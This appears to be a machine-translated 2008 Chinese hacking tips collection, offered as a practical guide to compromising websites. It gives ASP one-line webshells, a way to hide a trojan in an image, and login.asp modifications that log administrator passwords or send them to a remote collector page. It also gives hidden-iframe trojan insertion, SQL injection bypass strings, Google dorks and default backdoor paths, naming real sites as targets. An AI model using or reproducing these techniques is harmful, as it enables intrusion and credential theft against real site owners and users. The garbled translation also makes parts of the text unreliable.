Let you become the ASP Trojan master-vulnerability warning-the black bar safety net

ID MYHACK58:62200820740
Type myhack58
Reporter 佚名
Modified 2008-10-19T00:00:00


  1. Name: how to make a picture of the ASP Trojan can display pictures Built an asp file, the content of<!-- # of i nclude file="ating.jpg"-->找 一 个 正常 图片 ating.jpg, insert the word Trojan,such as the ice Fox, with ultraedit to hex compiled, insert a picture, to run a successful, but also to search<%and % >,which becomes 0 0,(don't replace your own asp),and then put the jpg file at the beginning of the join The following is the code snippet: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request. form(#)+) </SCRIPT>

2. Name: tricky cafe

First with Elite cafe auxiliary tool to get a username and password, and then Computer Management coupled to a machine, open the telnet,connected, open to share, copy a Trojan in the past run can.

3. Name: feel MD5 brute force charm rainbowcrack usage first with rtgen to generate library "rtgen md5 byte 1 7 5 2 4 0 0 4 0 0 0 0 all"1 and 7 represent the password minimum and maximum length Al statin I then added a method: http://md5.rednoize.com/ online crack or to http://www. md5lookup. com/? category=01-3&searck=on

  1. A lot of times we dofree killTrojan, do not understand the compilation, with the Beidou packers will be able to escape the kill, there are a lot of packers software, you Trojan the packers the best time to multi-select unknown add shell software.

5. Name: covert insertion type ASP Trojan

(1)in our to tricks of the asp file added the following contents

The following is the code snippet: <%if request("action")="ok" then%>

the shell code is inserted here, is best pony, but also to encrypt it

The following is the code snippet: <%end if%>

Visit time on your hand leg of the asp files back plus? action=ok,you can

(2)another method, in the our to tricks of the asp file added the following contents

The following is the code snippet: <% on error resume next strFileName = Request. QueryString("filer") set objStream = Server. createObject("ABODB. Stream") objStream. Type = 1 objStream. Open objStream. LoadFromFile strFileName objStream. SaveToFile Server. mappath("ating. asp"),2 %>

Access the time in the tricks of the asp files back plus? filer=XXX, XXX is your local upload of a path such as c:ating123.asp 上传 后 在 做手脚 的 asp 的 同 文件夹 中 有 ating,asp.

(3)the premise to give the system permission, and

Go to the website directory under a layer of mkdir s... copy ating. asp s.../ This antivirus software not found Visit http://website/s.../ating. asp can be

6. 工具 http://hack520.tengyi.cn/chaojiyonghu.rar this tool in the computer to generate a super user username: hack password 1 1 0, in DOS and the computer Manager can't see your build of the user, and is deleted.

7. Name: QQ group scripting attacks

Open the qq dialogue, deceive, copy the message, then the following content is saved as. vbs file, run it

The following is quoted fragment: Set WshShell= WScript. createobject("WScript. Shell") WshShell. AppActivate "QQ information attack script" for i=1 to 2 0 WScript. Sleep 1 0 0 0 WshShell. SendKeys"^v" WshShell. SendKeys i WshShell. SendKeys "%s" Next

8. Search: program production: WAN Peng free application space to directly upload asp the horse can be

9. Name: full find out where you stand on the ASP Trojan

(1) with antivirus software (2) for FTP client software, click"Tools"->"comparing folders" (3) with asplist2. 0. asp upload to the site the space review, the General features of ASP I estimated that the ASP Trojan (4) Using tool Beyond Compare

1 0 name: expand ideas to get DVBBS account "one man's Bible"of animation

(1)the previously obtained webshell want to enter DVBBS background,want the administrator password, it can be The old way: Modify admin_login. asp plaintext DVBBS backstage password In"username=trim(replace(request("username")this line behind Dim fsoObject Dim tsObject Set fsoObject = Server. createObject("Scripting. FileSystemObject") set tsObject = fsoObject. createTextFile(Server. MapPath("laner.txt")) tsObject. Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing As long as the administrator login background, 在目录下就生成了laner.txt

(2)login. asp in Case "login_chk"the following:

The following is the code snippet:

on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&request("username")&"text:"&request("password")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing

Such a laner. asp will get all of the login person login time, user name and password

(3)If you have your own website or another webshell(strongly recommended):

You can create a directory laner,on the inside create an empty laner. asp and the following code in the rain. asp:

The following is the code snippet: <%if request("n")<>"" and request("p")<>"" then on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing end if%>

1 1. Name: the use of QQ online status of catch the pigeon broiler

Generate a qq-line state, the inside address into the Trojan address, sent to the Forum in the login. asp where to insert the sentence:

The following is the code snippet: response. write"<scriptsrc=http://www. ptlushi. com/laner/rain. asp? n="&request("username")

&""&"&p="&request("password")&"></script>" response. write"<iframesrc=http://yourwebsite/laner/rain. asp? n="&request("username")


The results of all of the landing people will obediently put the name and password sent to your laner. asp.

1 2. Animation name: the media in China the entire Station program exists multiple vulnerabilities

Vulnerability program:media China the entire Station program(first version)official site:http://meiti. elgod. com/vulnerability: %5c(storm) upload injected into the upload page:down1/upload. asp

1 3. Name: Free Phone + MSH command-line tool

http://www.globe7.com/ open the home page, Click sit down angle, Free DownLoad, download to a local, installation, After the run, the prompts areLooking for your area code. Because it is international calls, register for an account, sent 1 0 0 cents, the domestic timing 0. 0 1/min, you have 1 0 0-white to play. Is an account Oh.

Should be noted that, the fixed telephone, PHS form is 0 0 8 6 5 2 1 1 2 3 4 5 6 5 2 1 Original 0 5 2 1, to omit the preceding zero, the phone number is the same.

1 4. Name: Bo-Blog a new vulnerability

http:// 网址 /index.php?job=../admin/ban 把 其中"a forbidden search of the words"that part of the<table>save out, inside of the address change is complete, insert the word Trojan

1 5. Name: hook soul's invasion of legend private server With Baidu search for legendary inurl:tuku or legendary inurl:wplm.htm or again the legendary inurl:coolsites. asp link to insert the word Trojan can be.

1 6. Program: hongda enterprise entire Station upload vulnerability in official home page:http://www. mu126. com/vulnerability page:/cx/upfile. asp (upload vulnerability)

1 7. No Pirates of the mailbox, modify the password, user name and password in the Add or=or

1 8. Name: bbsxp5. 1 6 the background to get webshell

bbsxp5. 1 6 the filter of the asp,asp,cdx,cer,the extension of the file to upload is in the basic settings on the Add On the upload type also is not, and prohibits the modified data from the backup data the name, we can put this web page saved locally, modified the source code uploaded.

1 9. Name: JHACKJ 2 0 0 5 years latest classic tutorial

Download look at it, good, each big website have

2 0. Name: effort the invasion of South Korea broiler

In the? D of the scan of the injection point item, open this: http://www.google.co.kr/advanced_search?hl=zh-CN这是高级搜索项 keywords just write. Here I write asp? name= set to display per page 1 0 0. Language selection of Korean. Search, a lot of sa.

2 1. Name: any Internet cafe management system crack Selected smart ABC, then vv is input, the cursor backward two steps, press the delete key just enter the two vv delete, and finally press the Inter key 2 2. the Name: crack the QQ space to insert a web page Trojan's code

Now Tencent has been sealed a lot more QQ space code, just as before <iframe src="Trojan address" name="lcx" width="0" height="0" frameborder="0"></iframe>insert pages the Trojan code also first to be terminated. Break disable method code is as follows:

The following is the code snippet: <div id=DI><img src="javascript :DI. innerHTML=\<iframe src=Trojan address width=1 9 0 height=1 9 0

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"


Finally attach Kara is ok to summarize the

  1. Upload vulnerability[does not speak] pS: if you see:Choose your file to upload [re-upload]or there is a"please login", 8 0% there is a loophole! Sometimes the upload will not necessarily be successful,it is because Cookies are not the same. We will use WSockExpert made Cookies. Then use the DOMAIN upload.

  2. Injection vulnerability[does not speak]

pS:the MD5 password. Sometimes we are not? easy to run out. If it is the[SQL Database]. Then we can use the following command: http:// 注入 网址;update admin set password=\new MD5 password\ where password=\old MD5 password\-- [the admin is the table name.]

  1. Side note,that is across the station.

We invaded a station may be the station sturdy invulnerable, we can find the next and this station the same server of the site, and then in the use of this Site with a mention of the right, sniffing and other methods to the invasion we want to invade the site., the Here there is a difficulty, is some of the server's absolute path after the encryption, which it is up to our skill.

  1. Storm library:put two directories in the middle of the/is replaced by%5c EY:http://www. ahttc. edu. cn/otherweb/dz/bgs/BigClass. asp? BigClassName=mandate&BigClassType=1 If you can see:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一个有效的路径 the. Determine the path name is spelled correctly, and whether the connection to the File Storage Server. This is the database. Download with FLASHGET into. MDB format.

5.\ or\=\or\this is a can connect to the SQL language phrase. You can go directly to the background. I collect a bit. Similar: \or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a

  1. Social engineering. This we all know. Just guess the solution. EY: the http://www.neu.edu.cn/waishi/admin admin waishi

  2. Written in ASP format database. Is the word Trojan[<%execute request("value")%>], commonly used in the guestbook. EY: the http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[this is the ASP format of the database], and then write the word Trojan

  3. Source: some web site with online download source code. Some webmasters very dish. What also does not change. EY:http://www. ahsdxy. ah. edu. cn/xiaoyoulu/index. asp This station used is: outstanding alumni, the source I have, the default database/webshell path: databaseliangu_data. the mdb backend management: adm_login. asp password and username are admin

  4. Default database/webshell path use:such a lot of sites/people to others of the WEBSHELL. /Databackup/dvbbs7. MDB /bbs/Databackup/dvbbs7. MDB /bbs/Data/dvbbs7. MDB /data/dvbbs7. mdb /bbs/diy. asp /diy. asp /bbs/cmd. asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe Tools: website, Hunter mining chicken EY: the http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

1 0. View a directory of law:the people some of the site can disconnect a directory, you can asked party directory. EY: the http://www.ujs168.com/shop/admin/ http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

So we can find database, download I don't need to teach.

1 1. Tool the overflow:. asp? NewsID= a /2j. asp? id=1 8 . asp? id=[this method can get a lot of WEBSHELL]

1 2. Search engines use:

(1). inurl:flasher_list. asp default database:database/the flash. the mdb backend/manager/ (2). Looking for website management background address: site:xxxx. comintext:management site:xxxx. comintitle:management <keyword many, since have been looking for> site:xxxx. cominurl:login (3). Find access database,mssql, mysql connection files allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb My master does not do. Self do do.

1 3. COOKIE deception:

Put their ID modified to the Administrator's MD5 password is also modified to his, with Guilin veterans of the tools you can modify COOKIES. This I will not speak more

1 4. The use of a Common Vulnerability: such as dynamic network BBS EY: the http://js1011.com/bbs/index.asp You can start with:dvbbs privilege elevation tool, so that the self has become the front Desk administrator. THEN, the use of:dynamic network solid top patch tool, find a solid-top patch, and then made COOKIES, this to your self do. We can use WSockExpert made Cookies/the NC package this I will not do, online tutorials, self-have a look.

Tools: dvbbs privilege elevation tool to automatically mesh the solid top of the patch tool

1 5. There are some old vulnerabilities.

As IIS3, 4 viewing source code, 5 deleteCGI, PHP some of the old hole, I will not say. Too old. There is nothing Dayong.